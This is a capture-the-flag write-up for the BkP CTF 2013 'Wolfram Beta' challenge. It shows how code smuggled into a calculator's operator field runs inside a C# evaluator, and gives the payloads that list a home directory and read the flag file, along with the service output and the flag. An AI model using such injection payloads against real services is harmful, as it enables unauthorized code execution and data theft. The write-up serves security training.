BkP CTF 2013 – Wolfram Beta – Misc 100

This challenge purports to be a calculator better than Wolfram Alpha. I’d agree. We can quickly crash it and see that it is written in C#. It asks us to input a number, operator, and another number. This combined with crash data makes me think it’s using Mono.CSharp.Evaluator.Run() with a string concatenation of the data we provided. So, we can run arbitrary code by entering a number, and then code in the operator field with the form *1;System.Console.WriteLine();. It’s trivial to get the working directory, and then we run

*1;System.IO.DirectoryInfo dirInfo = new System.IO.DirectoryInfo("/home/wbeta");System.IO.FileInfo[] files = dirInfo.GetFiles(); foreach(System.IO.FileInfo f in files) { System.Console.WriteLine(f.FullName); };

and receive

<br /> Wolfram Beta - BkP CTF 2013 Team<br /> Wolfram Beta is a great calculator.<br /> just put in a number at the prompt<br /> then put in the operator<br /> then finally the second number<br /> and the calculation will be done INSTANTLY<br /> no accounts necessacary, unlike some of our competition!<br /> first num: 1<br /> operator: *1;System.IO.DirectoryInfo dirInfo = new System.IO.DirectoryInfo("/home/wbeta");System.IO.FileInfo[] files = dirInfo.GetFiles(); foreach(System.IO.FileInfo f in files) { System.Console.WriteLine(f.FullName); };<br /> second num: 6<br /> Thinking...<br /> ..<br /> Done Thinking!<br /> /home/wbeta/.bash_history<br /> /home/wbeta/.bash_logout<br /> /home/wbeta/.bashrc<br /> /home/wbeta/.profile<br /> /home/wbeta/flag<br /> 6<br />

Now, let’s read the flag…

*1;string text = System.IO.File.ReadAllText("/home/wbeta/flag");System.Console.WriteLine(text);

<br /> Wolfram Beta - BkP CTF 2013 Team<br /> Wolfram Beta is a great calculator.<br /> just put in a number at the prompt<br /> then put in the operator<br /> then finally the second number<br /> and the calculation will be done INSTANTLY<br /> no accounts necessacary, unlike some of our competition!<br /> first num: 1<br /> operator: *1;string text = System.IO.File.ReadAllText("/home/wbeta/flag");System.Console.WriteLine(text);<br /> second num: 7<br /> Thinking...

Done Thinking!
at_least_its_not_a_python_jail

7